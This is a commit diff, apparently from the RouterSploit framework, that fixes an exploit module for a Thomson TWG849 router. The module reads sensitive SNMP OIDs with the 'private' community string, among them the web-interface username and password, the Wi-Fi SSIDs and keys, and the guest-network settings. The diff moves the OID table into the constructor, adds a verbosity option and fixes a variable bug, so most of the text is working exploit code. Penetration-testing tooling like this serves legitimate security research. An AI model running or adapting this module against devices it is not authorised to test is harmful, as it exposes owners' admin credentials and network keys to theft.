Fixing Thomson TWG849 Info Disclosure module (#410)

eae2c0c7 · Marcin Bury · GitHub · db145aaf · eae2c0c7
Unverified Commit eae2c0c7 authored May 10, 2018 by Marcin Bury Committed by GitHub May 10, 2018
Hide whitespace changes
Inline Side-by-side

Showing with 26 additions and 17 deletions

twg849_info_disclosure.py ...odules/exploits/routers/thomson/twg849_info_disclosure.py +26 -17

No files found.
--- a/routersploit/modules/exploits/routers/thomson/twg849_info_disclosure.py
+++ b/routersploit/modules/exploits/routers/thomson/twg849_info_disclosure.py
@@ -5,7 +5,7 @@ from routersploit.core.snmp.snmp_client import SNMPClient
 class Exploit(SNMPClient):
    __info__ = {
        "name": "Thomson TWG849 Info Disclosure",
-        "description": "Module exploits Thomson TWG849 information disclosure vulnerability which allows to read sensitive information.",
+        "description": "Module exploits Thomson TWG849 information disclosure vulnerability which allows reading sensitive information.",
        "authors": [
            "Sebastian Perez",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
@@ -20,21 +20,28 @@ class Exploit(SNMPClient):

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(161, "Target SNMP port")
+    
+    verbosity = OptBool("false", "Enable verbose output: true/false")

-    oids = {  # make, model, software version
-        "model": "1.3.6.1.2.1.1.1.0",
-        "uptime": "1.3.6.1.2.1.1.3.0",
-        # web interface credentials
-        "username": "1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0",
-        "password": "1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0",
-        # ssid and key
-        "ssid1": "1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.32",
-        "ssid2": "1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.2.32",
-        # guest network oids
-        "guest1": "1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.33",
-        "guest2": "1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.34",
-        "guest3": "1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.35",
-    }
+    def __init__(self):
+        self.oids = {
+            # make, model, software version
+            "model": "1.3.6.1.2.1.1.1.0",
+            "uptime": "1.3.6.1.2.1.1.3.0",
+
+            # web interface credentials
+            "username": "1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0",
+            "password": "1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0",
+
+            # ssid and key
+            "ssid1": "1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.32",
+            "ssid2": "1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.2.32",
+
+            # guest network oids
+            "guest1": "1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.33",
+            "guest2": "1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.34",
+            "guest3": "1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.35",
+        }

    def run(self):
        res = []
@@ -43,8 +50,10 @@ class Exploit(SNMPClient):
        for name in self.oids.keys():
            snmp = self.snmp_get("private", self.oids[name])
            if snmp:
-                value = str(varBinds[0][1])
-                res.append((name, value))
+                value = str(snmp[0][1])
+
+                if value:
+                    res.append((name, value))

        if res:
            print_success("Exploit success")